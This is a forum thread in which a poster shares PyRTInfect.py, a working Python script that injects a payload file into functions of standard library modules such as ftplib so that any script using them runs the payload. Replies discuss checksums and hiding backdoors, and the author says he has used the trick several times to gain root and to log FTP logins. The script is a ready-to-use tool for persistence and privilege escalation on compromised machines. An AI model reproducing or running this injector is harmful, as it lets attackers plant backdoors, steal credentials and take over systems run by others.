[Python] Python Module Infection

[Zer0Flag]

Hello,
 
 I recognized that you can modify default python modules like the "ftplib" and there are no checks if the module got modified and through that you can inject code which gets executed by all scripts which use the modified function. For example this could be used to execute code with admin rights even if your user doesn´t have this rights. Or to log FTP connections ( user , passwd , host , port... ) and a lot more. I didn´t found something about this issue on google and I don´t know if this is a known issue.
 
 I created a small script which helps to inject your code for testing purposes.

Code: [Select]

#!/usr/bin/python
#
# Coder   : Zer0Flag
# Date    : 18.06.2012
# Contact : zer0fl4g@googlemail.com
#
# Usage   : PyRTInfect.py -l <file you want inject into> -f <function you want inject into> -c <file you want to inject>
#           PyRTInfect.py -l <file you want to clean>
#
# Example : PyRTInfect.py -l C:\Python2.7\Lib\ftplib.py -f login -c C:\MyEvilPayload.py
#           PyRTInfect.py -l /usr/lib/python2.6/ftplib.py -f login -c /home/MyEvilPayload.py
#
# Tested  : Windows XP SP3 @ Python 2.7
#           Windows 7 SP1 @ Python 2.7
#           BackTrack 5 @ Python 2.6
#

import sys

def PrintUsage():
    print 'Usage:\n\t%s -l <file> -f <function> -c <file.to.inject>' % sys.argv[0]
    print '\t%s -l <file>\t#Clear all Injections' % sys.argv[0]
       
def InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject):
    if len(sFileToInfect) != 0 and len(sFunctionToInfect) != 0 and len(sFileToInject) != 0:
        sFTI = open(sFileToInfect,'r+')
        sFTIn = open(sFileToInject,'r+')
       
        bGoOn = True
        bWriteData = True
        iLineCounter = 0
        IWCount = 0
        sBackUpTFI = sFTI.readlines()
        sFTI.seek(0)
       
        while bGoOn:
            iLineCounter += 1
            sLine = sFTI.readline()
            if str(sLine).__contains__('def ' + sFunctionToInfect):
                print '[+] Function: \"%s\" found at %d' % (sFunctionToInfect,iLineCounter)
                print '[+] Going to Inject following lines!\n'
                sLinesToInject = sFTIn.readlines()
                for sLTI in sLinesToInject:
                    print sLTI
                   
                sFTI.seek(0)
                while bWriteData:
                    try:
                        sFTI.write(sBackUpTFI[IWCount])
                        if IWCount == iLineCounter:
                            sFTI.write('\t#1:Injected\n')
                            sFTI.writelines(sLinesToInject)
                            sFTI.write('\n\t#2:Injected\n')
                        IWCount += 1
                    except IndexError,e:
                        bWriteData = False
                bGoOn = False
       
        sFTI.close()
        sFTIn.close()
    else:
        return 0
    return 1

def ClearRTFile(sFileName):
    fRTFile = open(sFileName,'r+')
    fBackUp = fRTFile.readlines()
    fRTFile.seek(0)
    bWriteOk = True
    iCounter = 0
   
    for sLine in fBackUp:
        if str(sLine).__contains__('#1:Injected'):
            bWriteOk = False
            print '[+] Injected Line Found at %d' % iCounter
        elif str(sLine).__contains__('#2:Injected'):
            bWriteOk = True
            continue
           
        if bWriteOk:
            fRTFile.write(sLine)
        iCounter += 1
    return 1

if __name__ == "__main__":
    if len(sys.argv) < 3:
        PrintUsage()
    elif len(sys.argv) == 3:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                ClearRTFile(sys.argv[i + 1])               
    elif len(sys.argv) == 7:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                sFileToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-f':
                sFunctionToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-c':
                sFileToInject = sys.argv[i + 1]
               
        if InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject) == 0:
            PrintUsage()


~Zer0

[flowjob]

This is not really a security leak,as you only change the code on your local computer.
So e.g. you would only log the ftp data you entered on your computer..

Sometimes you may want to change a few lines of the org libs too,because something doesn't work...

[Zer0Flag]

Well but e.g. when you got access to a root and you see that the admin uses a backup python script you could inject into the used functions and got your code executed with root rights. So I think this is a fail from python to not check if the local libs got modified or not. A little crc check when the libs get imported and a warning to the user that he should be careful would be nice and easy to implement...

~Zer0

[Kulverstukas]

but the crc check could be passed just as easily... all checksums would have to be stored somewhere in order to compare them. You could then generate your own checksums and just replace them.
Using online checks is kinda not an option in here because it would generate unwanted traffic. Also checking integrity of those libs on each start would really decrease the speed. Imagine if some user has thousands of those libs...

[Zer0Flag]

I didn´t say that crc checks would be the ultimate protection also there is always a way to bypass the checks. But just as it is its dangerous to use py scripts on your roots... ( And No I don´t have something against py! I love it! )

~Zer0

[LeXeL]

also if the application is already running? I mean you will need to reload the aplication to import again the lib and the code get's executed...

[Zer0Flag]

sure they need to be reloaded to import the infected module. But just think about a backup script in .py which stores the .tar.gz on a ftp... and the scripts needs to be executed with admin rights to access all folders which needs to be saved...

Sure that are a lot of conditions which needs to be true for a successful attack but I already used this several times to get root access on a box and I think its very dangerous.

~Zer0Flag

[Kulverstukas]

It might be dangerous, but only with the right conditions. Therefore it degrades to "don't care" for a general rating.

[LeXeL]

I thought of this long time ago as a way to hide backdoors on a system good job ... but what happend if the user update python? Or the hall system

[techb]

I thought of this long time ago as a way to hide backdoors on a system good job ... but what happend if the user update python? Or the hall system

Most people are still using Python 2.* because there isn't a whole lot of third party support for 3.


The idea is almost good, but Python (even though popular), PHP is used a lot more and would be better to infect something like PHP.


Interpreted things aren't really a good target though.